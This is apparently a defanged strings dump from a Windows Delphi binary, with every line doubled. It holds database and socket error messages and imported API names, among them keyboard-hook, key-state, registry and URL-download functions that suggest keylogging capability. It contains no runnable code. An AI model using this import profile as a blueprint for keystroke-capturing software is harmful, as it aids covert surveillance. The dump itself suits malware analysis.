CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
CREATE TABLE x(%s
CREATE TABLE x(%s
%s, %s
%s, %s
%s {%s}
%s {%s}
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
10000000000000000010
10000000000000000010
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegQueryInfoKeyA
RegQueryInfoKeyA
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCreateKeyExA
GetCPInfo
GetCPInfo
version.dll
version.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
333333333333333333
333333333333333333
33333833
33333833
3333339
3333339
3333333333333338
3333333333333338
:*"*"$3338
:*"*"$3338
3333333
3333333
33333333
33333333
33333333333
33333333333
3333333333338
3333333333338
33338?383
33338?383
333333333333
333333333333
:*3:"$3338
:*3:"$3338
333333333333333
333333333333333
crtdll_wrapper
crtdll_wrapper
KWindows
KWindows
UrlMon
UrlMon
rSqlTimSt
rSqlTimSt
.uADStanAsync
.uADStanAsync
%uADPhysCmdPreprocessor
%uADPhysCmdPreprocessor
uADPhysSQLiteMeta
uADPhysSQLiteMeta
uADPhysSQLiteCli
uADPhysSQLiteCli
sndkey
sndkey
0IdHTTPHeaderInfo
0IdHTTPHeaderInfo
gDISQLite3Api
gDISQLite3Api
DISQLite3Database
DISQLite3Database
IdTCPServer
IdTCPServer
The procedure entry point %s could not be located in the dynamic link library %s
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
hXXp://VVV.w3.org/2001/XMLSchema
hXXp://VVV.w3.org/2001/XMLSchema
hXXp://VVV.w3.org/2000/xmlns/
hXXp://VVV.w3.org/2000/xmlns/
hXXp://VVV.w3.org/2001/XMLSchema-instance
hXXp://VVV.w3.org/2001/XMLSchema-instance
888816666554443
888816666554443
6666554443
6666554443
!6666554443
!6666554443
No help keyword specified.
No help keyword specified.
Alt Clipboard does not support Icons/Menu '%s' is already being used by another form
Alt Clipboard does not support Icons/Menu '%s' is already being used by another form
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Unsupported clipboard format
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
No matching DOM Vendor: "%s"
No matching DOM Vendor: "%s"
Node "%s" not found
Node "%s" not found
IDOMNode required.Attributes are not supported on this node type
IDOMNode required.Attributes are not supported on this node type
Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions
Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions
Node is readonlyCRefresh is only supported if the FileName or XML properties are set
Node is readonlyCRefresh is only supported if the FileName or XML properties are set
VTab: Operation is not supported!VTab: Savepoint [%d] is not found!VTab: Dataset modification failed/VTab: Explicit ROWID at INSERT is not supported9VTab: Dataset state was changed. Cannot perform operation"VTab: Specified row does not exist
VTab: Operation is not supported!VTab: Savepoint [%d] is not found!VTab: Dataset modification failed/VTab: Explicit ROWID at INSERT is not supported9VTab: Dataset state was changed. Cannot perform operation"VTab: Specified row does not exist
VTab: Invalid cursor;TADLocalSQL must be attached to an active SQLite connection0VTab: DataSet [%s] is busy by another result set/Cannot perform action. DBTOOLn.DLL is not found
VTab: Invalid cursor;TADLocalSQL must be attached to an active SQLite connection0VTab: DataSet [%s] is busy by another result set/Cannot perform action. DBTOOLn.DLL is not found
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters)"%s" DOMImplementation already registered
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters)"%s" DOMImplementation already registered
0[%s] is not a callable PL/SQL object (NOE130/SP)2[%s, #%d] is not found in [%s] package (NOE134/SP)TParameter with type TABLE OF BOOLEAN/RECORD not supported (use TADQuery) (NOE135/SP)KParameter with type RECORD must be of named type (use TADQuery) (NOE142/SP))Cannot convert Oracle Number [%s] to TBcd7DBMS_PIPE event alerter supports only single event name9Cannot start a trace session, when there is an active one"Stored procedure [%s] is not founduArray-typed variable [%s] dimensions [%d] are not supported.
0[%s] is not a callable PL/SQL object (NOE130/SP)2[%s, #%d] is not found in [%s] package (NOE134/SP)TParameter with type TABLE OF BOOLEAN/RECORD not supported (use TADQuery) (NOE135/SP)KParameter with type RECORD must be of named type (use TADQuery) (NOE142/SP))Cannot convert Oracle Number [%s] to TBcd7DBMS_PIPE event alerter supports only single event name9Cannot start a trace session, when there is an active one"Stored procedure [%s] is not founduArray-typed variable [%s] dimensions [%d] are not supported.
Only sigle dimensional simple type arrays are supportedqArray-typed variable [%s] unsupported element type [%d].
Only sigle dimensional simple type arrays are supportedqArray-typed variable [%s] unsupported element type [%d].
Only sigle dimensional simple type arrays are supportedCArray-typed variable [%s] item index [%d] is out of bounds [%d, %d]
Only sigle dimensional simple type arrays are supportedCArray-typed variable [%s] item index [%d] is out of bounds [%d, %d]
Cannot describe type [%d].
Cannot describe type [%d].
%sHSQLite library initialization failed. Main code [%d], extended code [%d]/Database specified by [%p] handle was not foundHVTab: Invalid number of arguments at VTabCreate. Expected [%d], got [%d](VTab: Dataset [%s] is not found or empty
%sHSQLite library initialization failed. Main code [%d], extended code [%d]/Database specified by [%p] handle was not foundHVTab: Invalid number of arguments at VTabCreate. Expected [%d], got [%d](VTab: Dataset [%s] is not found or empty
UUnsupported MySQL version [%d].
UUnsupported MySQL version [%d].
Supported are client and server from v 3.20 to v 6.2
Supported are client and server from v 3.20 to v 6.2
Port number cannot be changed&Error in parameter [%s] definition. %sFFailed to initialize embedded server.
Port number cannot be changed&Error in parameter [%s] definition. %sFFailed to initialize embedded server.
See MySQL log files for details/Variable [%s] C data type [%d] is not supported
See MySQL log files for details/Variable [%s] C data type [%d] is not supported
No cursors availableCCannot initialize OCI with character set [%s].
No cursors availableCCannot initialize OCI with character set [%s].
Possible reason: %s1Cannot assign value to BFILE/CFILE parameter [%s]HNo cursor parameters are defined. Include fiMeta into FetchOptions.Items9OCI is not properly installed on this machine (NOE1/INIT)ZUnsupported OCI library [%s] version [%s].
Possible reason: %s1Cannot assign value to BFILE/CFILE parameter [%s]HNo cursor parameters are defined. Include fiMeta into FetchOptions.Items9OCI is not properly installed on this machine (NOE1/INIT)ZUnsupported OCI library [%s] version [%s].
At least version 8.0.3 is required (NOE2/INIT)0Bad or undefined variable param type (NOE12/VAR)5Maximum length (%d) of GTRID exceeded - %d (NOE18/TX)5Maximum length (%d) of BQUAL exceeded - %d (NOE19/TX)@Maximum length (%d) of transaction name exceeded - %d (NOE20/TX)@Too many close braces in names file after alias [%s] (NOE105/DB)
At least version 8.0.3 is required (NOE2/INIT)0Bad or undefined variable param type (NOE12/VAR)5Maximum length (%d) of GTRID exceeded - %d (NOE18/TX)5Maximum length (%d) of BQUAL exceeded - %d (NOE19/TX)@Maximum length (%d) of transaction name exceeded - %d (NOE20/TX)@Too many close braces in names file after alias [%s] (NOE105/DB)
"Cannot move file [%s] to [%s].
"Cannot move file [%s] to [%s].
%s!Invalid date interval format [%s]Ênnot execute host command [%s].
%s!Invalid date interval format [%s]Ênnot execute host command [%s].
%s)String size must be of 1 character length.Character cannot be alphanumeric or whitespace
%s)String size must be of 1 character length.Character cannot be alphanumeric or whitespace
Invalid command [%s] syntax-ACCEPT statement must specify a variable name,DEFINE requires a value following equal sign
Invalid command [%s] syntax-ACCEPT statement must specify a variable name,DEFINE requires a value following equal sign
VARIABLE has missed right brace"VARIABLE has unsupported data typeÊnnot execute command. Not logged onlNo script commands registered.
VARIABLE has missed right brace"VARIABLE has unsupported data typeÊnnot execute command. Not logged onlNo script commands registered.
Possible reason: uADCompScriptCommands unit is not linked to the application`No script to execute for [%s].
Possible reason: uADCompScriptCommands unit is not linked to the application`No script to execute for [%s].
Possible reason: SQLScriptFileName and SQLScripts both are empty Connection parameter [%s] must be not empty|DbExpress driver configuration file [%s] is not found.
Possible reason: SQLScriptFileName and SQLScripts both are empty Connection parameter [%s] must be not empty|DbExpress driver configuration file [%s] is not found.
Timeout expired"Cannot get access to BLOB raw datahVariable length data parameter [%s] overflow.
Timeout expired"Cannot get access to BLOB raw datahVariable length data parameter [%s] overflow.
Value length - [%d], parameter data maximum length - [%d]PCannot perform nonblocking action, while other nonblocking action is in progress
Value length - [%d], parameter data maximum length - [%d]PCannot perform nonblocking action, while other nonblocking action is in progress
Macro [%s] is not found7Parameter [%s] value index [%d] is out of range [0..%d]mCannot acquire item (connection) from pool.
Macro [%s] is not found7Parameter [%s] value index [%d] is out of range [0..%d]mCannot acquire item (connection) from pool.
Maximal number [%d] of simultaneous items (connections) reached.@.
Maximal number [%d] of simultaneous items (connections) reached.@.
To register it, you can drop component [%s] into your project>.
To register it, you can drop component [%s] into your project>.
To register it, you can include unit [%s] into your project
To register it, you can include unit [%s] into your project
Cannot read [%s] property
Cannot read [%s] property
Cannot read [%s] object#Cannot read RAW data of [%s] object
Cannot read [%s] object#Cannot read RAW data of [%s] object
Class [%s] is not registered
Class [%s] is not registered
Unknown storage format [%s]
Unknown storage format [%s]
Table adapter [%s] cannot be assigned to [%s], because it is
Table adapter [%s] cannot be assigned to [%s], because it is
already assigned to [%s] and cannot be shared across few datasets6Dataset connection does not match to called connection Table [%s] must have primary keyWLocal SQL engine misusage by [%s].
already assigned to [%s] and cannot be shared across few datasets6Dataset connection does not match to called connection Table [%s] must have primary keyWLocal SQL engine misusage by [%s].
Hint: activate connection before activating dataset=Table [%s] index [%s] must be existing non-expressional index
Hint: activate connection before activating dataset=Table [%s] index [%s] must be existing non-expressional index
Dataset name must be not empty?Dataset name [%s] must be unique across Local SQL [%s] datasets
Dataset name must be not empty?Dataset name [%s] must be unique across Local SQL [%s] datasets
Text field [%s] is not found
Text field [%s] is not found
Destination dataset not set;Destination text data file name or stream must be specified6Source text data file name or stream must be specified=Text field [%s] size is undefined in Fixed Size Record format"Text field [%s] name is Duplicated5Bad text value [%s] format for mapping item [%s].
Destination dataset not set;Destination text data file name or stream must be specified6Source text data file name or stream must be specified=Text field [%s] size is undefined in Fixed Size Record format"Text field [%s] name is Duplicated5Bad text value [%s] format for mapping item [%s].
%s?Undefined source field or expression for destination field [%s]
%s?Undefined source field or expression for destination field [%s]
ADManager must be active#Connection name [%s] must be unique Connection [%s] must be inactive
ADManager must be active#Connection name [%s] must be unique Connection [%s] must be inactive
Connection [%s] must be active)Connection [%s] establishment is canceled
Connection [%s] must be active)Connection [%s] establishment is canceled
Connection [%s] cannot be pooled.
Connection [%s] cannot be pooled.
Possible reason: connection definition is not in the ADManager.ConnectionDefs list or
Possible reason: connection definition is not in the ADManager.ConnectionDefs list or
TADConnection.Params has additional parameters
TADConnection.Params has additional parameters
Connection [%s] is not found
Connection [%s] is not found
Possible reason: [%s] ConnectionName property is misspelled or references to nonexistent connection$Command [%s] must be in active state&Command [%s] must be in inactive state*Dataset [%s] must be in cached update moderConnection is not defined for [%s].
Possible reason: [%s] ConnectionName property is misspelled or references to nonexistent connection$Command [%s] must be in active state&Command [%s] must be in inactive state*Dataset [%s] must be in cached update moderConnection is not defined for [%s].
Connection [%s] must be online
Connection [%s] must be online
Expected number of parameters is [%d], but actual number is [%d].
Expected number of parameters is [%d], but actual number is [%d].
Possible reason: a parameter was added or deletedsData too large for variable [%s]. Max len = [%d], actual len = [%d]
Possible reason: a parameter was added or deletedsData too large for variable [%s]. Max len = [%d], actual len = [%d]
Hint: set the TADParam.Size to a greater value
Hint: set the TADParam.Size to a greater value
Database [%s] does not exist
Database [%s] does not exist
Access 2003 or earlier: hXXp://support.microsoft.com/kb/239114
Access 2003 or earlier: hXXp://support.microsoft.com/kb/239114
Access 2007: hXXp://VVV.microsoft.com/download/en/details.aspx?displaylang=en&id=23734
Access 2007: hXXp://VVV.microsoft.com/download/en/details.aspx?displaylang=en&id=23734
Access 2010: hXXp://VVV.microsoft.com/download/en/details.aspx?id=13255{JRO.JetEngine class is missing on client machine.
Access 2010: hXXp://VVV.microsoft.com/download/en/details.aspx?id=13255{JRO.JetEngine class is missing on client machine.
Hint: install latest engine from: hXXp://support.microsoft.com/kb/239114aDatabase format is not recognized.
Hint: install latest engine from: hXXp://support.microsoft.com/kb/239114aDatabase format is not recognized.
Possible reason: DBVersion value mismatches database version.&Specified database password is invalid
Possible reason: DBVersion value mismatches database version.&Specified database password is invalid
Unknown OLE error1To perform operation DriverLink must be specified To perform operation service must be activeGCannot deinstall a SQLite collation, while there are active connections?%s command %s [%d] instead of [1] record.
Unknown OLE error1To perform operation DriverLink must be specified To perform operation service must be activeGCannot deinstall a SQLite collation, while there are active connections?%s command %s [%d] instead of [1] record.
Possible reasons: %saupdate table does not have PK or row identifier,
Possible reasons: %saupdate table does not have PK or row identifier,
record has been changed/deleted by another user
record has been changed/deleted by another user
Too long identifier (> 255)6Parameter [%s] ArraySize [%d] is less than ATimes [%d]=Cannot perform action, because previous action is in progress%Escape function [%s] is not supported8Define(mmReset) is only supported for metainfo retrieval6Cannot generate update query. WHERE condition is empty4Cannot generate update query. Update table undefined
Too long identifier (> 255)6Parameter [%s] ArraySize [%d] is less than ATimes [%d]=Cannot perform action, because previous action is in progress%Escape function [%s] is not supported8Define(mmReset) is only supported for metainfo retrieval6Cannot generate update query. WHERE condition is empty4Cannot generate update query. Update table undefined
Cannot parse object name - [%s])Syntax error in escape function [%s].
Cannot parse object name - [%s])Syntax error in escape function [%s].
%shADPhysManager shutdown timeout.
%shADPhysManager shutdown timeout.
Possible reason: application has not released all connection interfaceszParameter [%s] data type is unknown.
Possible reason: application has not released all connection interfaceszParameter [%s] data type is unknown.
Hint: specify TADParam.DataType or assign TADParam value before Prepare/Execute call)Parameter [%s] data type is not supported&Column [%s] data type is not supported
Hint: specify TADParam.DataType or assign TADParam value before Prepare/Execute call)Parameter [%s] data type is not supported&Column [%s] data type is not supported
Param [%s] type changed from [ft%s] to [ft%s]. Query must be reprepared.
Param [%s] type changed from [ft%s] to [ft%s]. Query must be reprepared.
Possible reason: an assignment to a TADParam.AsXXX property implicitly changed the parameter data type.
Possible reason: an assignment to a TADParam.AsXXX property implicitly changed the parameter data type.
Hint: use the TADParam.Value or appropriate TADParam.AsXXX property1A meta data argument [%s] value must be specified
Hint: use the TADParam.Value or appropriate TADParam.AsXXX property1A meta data argument [%s] value must be specified
CTransaction [%s] must be inactive. Nested transactions are disabled
CTransaction [%s] must be inactive. Nested transactions are disabled
Hint: use Execute / ExecSQL method for non-SELECT commands!Command must be is prepared state]Cannot execute command returning result sets.
Hint: use Execute / ExecSQL method for non-SELECT commands!Command must be is prepared state]Cannot execute command returning result sets.
Hint: use Open method for SELECT-like commands!Command must be open for fetching/Exact %s [%d] of rows, while [%d] was requested
Hint: use Open method for SELECT-like commands!Command must be open for fetching/Exact %s [%d] of rows, while [%d] was requested
Meta information mismatchvCannot load vendor library [%s].
Meta information mismatchvCannot load vendor library [%s].
%sHint: check it is in the PATH or application EXE directories, and has x86 bitness./Cannot get vendor library entry point[s].
%sHint: check it is in the PATH or application EXE directories, and has x86 bitness./Cannot get vendor library entry point[s].
Connection must be inactive*Too many login retries. Allowed [%d] times1To perform operation driver manager, must be [%s]
Connection must be inactive*Too many login retries. Allowed [%d] times1To perform operation driver manager, must be [%s]
Character [%s] is missed
Character [%s] is missed
eCannot set dataset [%s] to offline mode.
eCannot set dataset [%s] to offline mode.
Hint: check that FetchOptions.AutoFetchAll is not afDisable|Cannot turn off cached updates mode for DataSet [%s].
Hint: check that FetchOptions.AutoFetchAll is not afDisable|Cannot turn off cached updates mode for DataSet [%s].
Hint: dataset has updated rows, cancel or apply updates before action.Cannot make definition [%s] circular reference7Cannot %s definition [%s]. It has associated connection!Cannot make definition persistent9Cannot load definition list, because it is already loaded$Definition [%s] is not found in [%s]"Definition name [%s] is duplicated"Driver [%s] is not registered.
Hint: dataset has updated rows, cancel or apply updates before action.Cannot make definition [%s] circular reference7Cannot %s definition [%s]. It has associated connection!Cannot make definition persistent9Cannot load definition list, because it is already loaded$Definition [%s] is not found in [%s]"Definition name [%s] is duplicated"Driver [%s] is not registered.
%sXDriver [%s] cannot be released.
%sXDriver [%s] cannot be released.
Hint: Close all TADConnection objects and release poolsNTo register it, you can drop component [TADPhys%sDriverLink] into your project5Correct driver ID or define [%s] virtual driver in %seDriver ID is not defined.
Hint: Close all TADConnection objects and release poolsNTo register it, you can drop component [TADPhys%sDriverLink] into your project5Correct driver ID or define [%s] virtual driver in %seDriver ID is not defined.
Set TADConnection.DriverName or add DriverID to your connection definition
Set TADConnection.DriverName or add DriverID to your connection definition
Capability is not supported
Capability is not supported
Transaction [%s] must be active
Transaction [%s] must be active
View [%s] is not a sorted view"Adapter interface must be suppliedUCannot set MasterSource for dataset [%s].
View [%s] is not a sorted view"Adapter interface must be suppliedUCannot set MasterSource for dataset [%s].
Nested datasets cannot have a MasterSourceMCannot set MasterSource for dataset [%s].
Nested datasets cannot have a MasterSourceMCannot set MasterSource for dataset [%s].
Circular datalinks are not alloweduCannot refresh dataset [%s].
Circular datalinks are not alloweduCannot refresh dataset [%s].
Cannot open dataset [%s].
Cannot open dataset [%s].
Hint: if that is TADMemTable, use CreateDataSet or CloneCursor to open dataset(Index [%s] is not found for dataset [%s],Aggregate [%s] is not found for dataset [%s]6Index [%s] definition is not complete for dataset [%s]:Aggregate [%s] definition is not complete for dataset [%s]7Cannot perform operation on unidirectional dataset [%s]LBookmark key fields [%s] are incompatible
Hint: if that is TADMemTable, use CreateDataSet or CloneCursor to open dataset(Index [%s] is not found for dataset [%s],Aggregate [%s] is not found for dataset [%s]6Index [%s] definition is not complete for dataset [%s]:Aggregate [%s] definition is not complete for dataset [%s]7Cannot perform operation on unidirectional dataset [%s]LBookmark key fields [%s] are incompatible
with dataset [%s] key fields [%s] Record editing for dataset [%s] is disabled-Record inserting for dataset [%s] is disabled,Record deleting for dataset [%s] is disabled=Field [%s] specified within %s of DataSet [%s] does not exist
with dataset [%s] key fields [%s] Record editing for dataset [%s] is disabled-Record inserting for dataset [%s] is disabled,Record deleting for dataset [%s] is disabled=Field [%s] specified within %s of DataSet [%s] does not exist
Invalid use of keyword
Invalid use of keyword
Invalid character found [%s]
Invalid character found [%s]
'(' expected but [%s] found"')' or ',' expected but [%s] found
'(' expected but [%s] found"')' or ',' expected but [%s] found
')' expected but [%s] found"IN predicate list may not be empty
')' expected but [%s] found"IN predicate list may not be empty
Expected [%s].Arithmetic in filter expressions not supported>Operation cannot mix aggregate value with record-varying value
Expected [%s].Arithmetic in filter expressions not supported>Operation cannot mix aggregate value with record-varying value
%s&Bookmark is not found for dataset [%s]
%s&Bookmark is not found for dataset [%s]
XVariable length column [%s] overflow.
XVariable length column [%s] overflow.
Value length - [%d], column maximum length - [%d]
Value length - [%d], column maximum length - [%d]
Invalid foreign key [%s]
Invalid foreign key [%s]
Invalid unique key [%s]#Cannot change column [%s] data type
Invalid unique key [%s]#Cannot change column [%s] data type
Invalid relation [%s](Cannot create parent view. Relation [%s]7Cannot change table [%s] structure, when table has rows;Found a cascading actions loop at checking foreign key [%s]
Invalid relation [%s](Cannot create parent view. Relation [%s]7Cannot change table [%s] structure, when table has rows;Found a cascading actions loop at checking foreign key [%s]
Record is not lockedFAssigning value [%s] is not compatible with column [%s] data type.
Record is not lockedFAssigning value [%s] is not compatible with column [%s] data type.
%s,Value [%s] is out of range of [%s] data typeuColumn or function [%s] is not found.
%s,Value [%s] is out of range of [%s] data typeuColumn or function [%s] is not found.
4Duplicate row found on unique index. Constraint [%s]/Cannot process - no parent row. Constraint [%s]2Cannot process - child rows found. Constraint [%s]
4Duplicate row found on unique index. Constraint [%s]/Cannot process - no parent row. Constraint [%s]2Cannot process - child rows found. Constraint [%s]
Cannot compare rowsÚta type conversion is not supported
Cannot compare rowsÚta type conversion is not supported
Column [%s] is not searchable=Row may have only single column of [dtParentRowRef] data typewCannot read data from or write data to the invariant column [%s].
Column [%s] is not searchable=Row may have only single column of [dtParentRowRef] data typewCannot read data from or write data to the invariant column [%s].
Row is not nested)Column [%s] is not reference to other row'Column [%s] is not reference to row set&Cannot perform operation for row state4Cannot change updates registry for DatS manager [%s]"Too many aggregate values per view9Grouping level exceeds maximum allowed for aggregate [%s]
Row is not nested)Column [%s] is not reference to other row'Column [%s] is not reference to row set&Cannot perform operation for row state4Cannot change updates registry for DatS manager [%s]"Too many aggregate values per view9Grouping level exceeds maximum allowed for aggregate [%s]
Invalid SQL date/time values
Invalid SQL date/time values
FireDAC Login#Name [%s] is duplicated in the list
FireDAC Login#Name [%s] is duplicated in the list
Object [%s] is not found(Column [%s] type is unknown or undefined
Object [%s] is not found(Column [%s] type is unknown or undefined
Constraint [%s]
Constraint [%s]
Cannot begin edit row'Cannot create child view. Relation [%s]
Cannot begin edit row'Cannot create child view. Relation [%s]
Cannot delete row Column [%s] must have blob value_Fixed length column [%s] data length mismatch.
Cannot delete row Column [%s] must have blob value_Fixed length column [%s] data length mismatch.
Value length - [%d], column fixed length - [%d]
Value length - [%d], column fixed length - [%d]
Column [%s] is read only
Column [%s] is read only
Cannot insert row into table"Column [%s] value must be not null
Cannot insert row into table"Column [%s] value must be not null
!Cannot modify a read-only dataset#Nested dataset must inherit from %s
!Cannot modify a read-only dataset#Nested dataset must inherit from %s
Parameter '%s' not found
Parameter '%s' not found
Unable to load bind parameters$Field '%s' is of an unsupported type
Unable to load bind parameters$Field '%s' is of an unsupported type
SQL not supported: %s
SQL not supported: %s
Execute not supported: %s1Operation not allowed on a unidirectional dataset
Execute not supported: %s1Operation not allowed on a unidirectional dataset
%s is not a valid BCD value
%s is not a valid BCD value
Invalid format type for BCD$Could not parse SQL TimeStamp string
Invalid format type for BCD$Could not parse SQL TimeStamp string
6Size mismatch for field '%s', expecting: %d actual: %d Invalid variant type or size for field '%s'#Value of field '%s' is out of range
6Size mismatch for field '%s', expecting: %d actual: %d Invalid variant type or size for field '%s'#Value of field '%s' is out of range
Field '%s' must have a value
Field '%s' must have a value
Field '%s' has no dataset1Field '%s' cannot be a calculated or lookup field
Field '%s' has no dataset1Field '%s' cannot be a calculated or lookup field
Field '%s' cannot be modified
Field '%s' cannot be modified
No index currently active0Field '%s' is not indexed and cannot be modified"Circular datalinks are not allowed/Lookup information for field '%s' is incomplete
No index currently active0Field '%s' is not indexed and cannot be modified"Circular datalinks are not allowed/Lookup information for field '%s' is incomplete
DataSource cannot be changed0Cannot perform this operation on an open dataset"Dataset not in edit or insert mode1Cannot perform this operation on a closed dataset1Cannot perform this operation on an empty dataset
DataSource cannot be changed0Cannot perform this operation on an open dataset"Dataset not in edit or insert mode1Cannot perform this operation on a closed dataset1Cannot perform this operation on an empty dataset
Invalid FieldKind Field '%s' is of an unknown type
Invalid FieldKind Field '%s' is of an unknown type
Duplicate field name '%s'
Duplicate field name '%s'
Field '%s' not found#Cannot access field '%s' as type %s
Field '%s' not found#Cannot access field '%s' as type %s
Invalid value for field '%s'E%g is not a valid value for field '%s'. The allowed range is %g to %gE%s is not a valid value for field '%s'. The allowed range is %s to %s0'%s' is not a valid integer value for field '%s'0'%s' is not a valid boolean value for field '%s'7'%s' is not a valid floating point value for field '%s'6Type mismatch for field '%s', expecting: %s actual: %s
Invalid value for field '%s'E%g is not a valid value for field '%s'. The allowed range is %g to %gE%s is not a valid value for field '%s'. The allowed range is %s to %s0'%s' is not a valid integer value for field '%s'0'%s' is not a valid boolean value for field '%s'7'%s' is not a valid floating point value for field '%s'6Type mismatch for field '%s', expecting: %s actual: %s
Not Acceptable(Request method requires HTTP version 1.1DThis authentication method is already registered with class name %s.$Error accepting connection with SSL.
Not Acceptable(Request method requires HTTP version 1.1DThis authentication method is already registered with class name %s.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
SSL status: "%s"
File "%s" not found
File "%s" not found
Object type not supported.
Object type not supported.
Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
Reply Code is not valid: %s4Failed attempting to retrieve time zone information.
Reply Code is not valid: %s4Failed attempting to retrieve time zone information.
QRequest rejected because the client program and identd report different user-ids.
QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Command not supported.
Address type not supported."%d: Circular links are not allowed
Address type not supported."%d: Circular links are not allowed
&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Invalid Port Range (%d - %d)
Invalid Port Range (%d - %d)
%s is not a valid service.
%s is not a valid service.
IPv6 unavailable:The requested IPVersion / Address family is not supported.
IPv6 unavailable:The requested IPVersion / Address family is not supported.
End of stream: Class %s at %d)UDP is not support in this SOCKS version.
End of stream: Class %s at %d)UDP is not support in this SOCKS version.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Protocol not supported.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Protocol family not supported.0Address family not supported by protocol family.
Connecting to %s.
Connecting to %s.
Socket Error # %d
Socket Error # %d
Operation would block.
Operation would block.
Operation now in progress.
Operation now in progress.
Operation already in progress.
Operation already in progress.
Socket operation on non-socket.
Socket operation on non-socket.
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
%s.Seek not implemented$Operation not allowed on sorted list
%s expected$%s not in a class registration group
%s expected$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
Invalid stream operation
Invalid stream operation
Error*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Error*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Resolving hostname %s.
Invalid data type for '%s'
Invalid data type for '%s'
Line too long List capacity out of bounds (%d)
Line too long List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
List index out of bounds (%d) Out of memory while expanding memory stream
%s on line %d
%s on line %d
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to create key %s
Failed to create key %s
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
ECheckSynchronize called from thread $%x, which is NOT the main thread
ECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid property element: %s
Invalid property element: %s
Invalid property type: %s
Invalid property type: %s
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
''%s'' expected
''%s'' expected
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
